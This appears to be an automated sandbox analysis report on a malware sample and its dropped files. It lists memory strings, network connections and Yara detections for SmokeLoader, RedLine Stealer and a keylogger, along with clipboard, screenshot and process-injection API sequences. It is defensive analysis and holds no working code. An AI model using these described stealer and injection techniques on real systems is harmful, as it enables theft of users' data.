Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 53098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53089
Source: unknown	Network traffic detected: HTTP traffic on port 53107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53094
Source: unknown	Network traffic detected: HTTP traffic on port 53089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53099
Source: unknown	Network traffic detected: HTTP traffic on port 53100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53098
Source: unknown	Network traffic detected: HTTP traffic on port 53085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53091
Source: unknown	Network traffic detected: HTTP traffic on port 53112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53066
Source: unknown	Network traffic detected: HTTP traffic on port 53088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53108
Source: unknown	Network traffic detected: HTTP traffic on port 53111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53068
Source: unknown	Network traffic detected: HTTP traffic on port 53101 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53107
Source: unknown	Network traffic detected: HTTP traffic on port 53105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53104
Source: unknown	Network traffic detected: HTTP traffic on port 53109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53074
Source: unknown	Network traffic detected: HTTP traffic on port 53114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53113
Source: unknown	Network traffic detected: HTTP traffic on port 53104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53111
Source: unknown	Network traffic detected: HTTP traffic on port 53086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53087
Source: unknown	Network traffic detected: HTTP traffic on port 53082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53085

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53076 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53077 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.8:53085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.27.34.12:443 -> 192.168.2.8:53087 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Code function: 7_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

7_2_0042EAB0

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Code function: 7_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

7_2_0042EAB0

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Code function: 7_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

7_2_0042EC90

Yara detected Keylogger Generic

Source: Yara match	File source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Abnormal high CPU Usage

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401615
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401658
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401620
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401524
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040162D
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401635
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401615
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401658
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00403406 LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,	6_2_00403406
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401620
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401524
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_0040162D
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401635
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Code function: 11_2_04279B10 NtProtectVirtualMemory,NtProtectVirtualMemory,	11_2_04279B10
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Code function: 11_2_0427A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,	11_2_0427A4F0
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Code function: 11_2_04279850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,	11_2_04279850

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00427353	7_2_00427353
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00420880	7_2_00420880
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00404970	7_2_00404970
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0041FD10	7_2_0041FD10
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0043B050	7_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00426174	7_2_00426174
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_004061F0	7_2_004061F0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00426284	7_2_00426284
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_004223B8	7_2_004223B8
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00405440	7_2_00405440
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0040F400	7_2_0040F400
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_004164D2	7_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00433480	7_2_00433480
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00403570	7_2_00403570
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00421580	7_2_00421580
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_004016E0	7_2_004016E0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_004067B0	7_2_004067B0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_004089A0	7_2_004089A0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00421C71	7_2_00421C71
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00425CEE	7_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00440D36	7_2_00440D36
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0043AD30	7_2_0043AD30
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00407DF0	7_2_00407DF0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00404EF0	7_2_00404EF0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00435EB0	7_2_00435EB0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00403F80	7_2_00403F80
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02121267	7_2_02121267
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0215B2B7	7_2_0215B2B7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021463DB	7_2_021463DB
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02128057	7_2_02128057
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02142067	7_2_02142067
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02156117	7_2_02156117
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02125157	7_2_02125157
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021241E7	7_2_021241E7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0212F667	7_2_0212F667
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021256A7	7_2_021256A7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021536E7	7_2_021536E7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02136739	7_2_02136739
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021237D7	7_2_021237D7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02126457	7_2_02126457
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021464EB	7_2_021464EB
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021475BA	7_2_021475BA
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02126A17	7_2_02126A17
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02140AE7	7_2_02140AE7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02124BD7	7_2_02124BD7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02145F55	7_2_02145F55
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0215AF97	7_2_0215AF97
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02128C07	7_2_02128C07
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Code function: 11_2_0427AB10	11_2_0427AB10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1E8D20	12_2_6D1E8D20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D18AD50	12_2_6D18AD50
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D12ED70	12_2_6D12ED70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F6D90	12_2_6D0F6D90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D064DB0	12_2_6D064DB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1ECDC0	12_2_6D1ECDC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D126C00	12_2_6D126C00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13AC30	12_2_6D13AC30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D06AC60	12_2_6D06AC60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D05ECC0	12_2_6D05ECC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0BECD0	12_2_6D0BECD0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D066F10	12_2_6D066F10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A0F20	12_2_6D1A0F20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0CEF40	12_2_6D0CEF40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D122F70	12_2_6D122F70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A8FB0	12_2_6D1A8FB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D06EFB0	12_2_6D06EFB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13EFF0	12_2_6D13EFF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D060FE0	12_2_6D060FE0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D140E20	12_2_6D140E20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0FEE70	12_2_6D0FEE70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0E6E90	12_2_6D0E6E90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D06AEC0	12_2_6D06AEC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D100EC0	12_2_6D100EC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0B6900	12_2_6D0B6900
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D098960	12_2_6D098960
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1209B0	12_2_6D1209B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F09A0	12_2_6D0F09A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D11A9A0	12_2_6D11A9A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D17C9E0	12_2_6D17C9E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0949F0	12_2_6D0949F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0B0820	12_2_6D0B0820
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0EA820	12_2_6D0EA820
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D134840	12_2_6D134840
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1668E0	12_2_6D1668E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D100BA0	12_2_6D100BA0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D166BE0	12_2_6D166BE0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D10EA00	12_2_6D10EA00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D118A30	12_2_6D118A30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0DCA70	12_2_6D0DCA70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0DEA80	12_2_6D0DEA80
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A8550	12_2_6D1A8550
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0B8540	12_2_6D0B8540
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D164540	12_2_6D164540
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D100570	12_2_6D100570
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C2560	12_2_6D0C2560
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0545B0	12_2_6D0545B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D12A5E0	12_2_6D12A5E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0EE5F0	12_2_6D0EE5F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C4420	12_2_6D0C4420
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0EA430	12_2_6D0EA430
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D078460	12_2_6D078460
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D18A480	12_2_6D18A480
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0A64D0	12_2_6D0A64D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0FA4D0	12_2_6D0FA4D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0E0700	12_2_6D0E0700
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D08A7D0	12_2_6D08A7D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0BC650	12_2_6D0BC650
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0846D0	12_2_6D0846D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0BE6E0	12_2_6D0BE6E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0FE6E0	12_2_6D0FE6E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D144130	12_2_6D144130
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0D6130	12_2_6D0D6130
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C8140	12_2_6D0C8140
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0601E0	12_2_6D0601E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D128010	12_2_6D128010
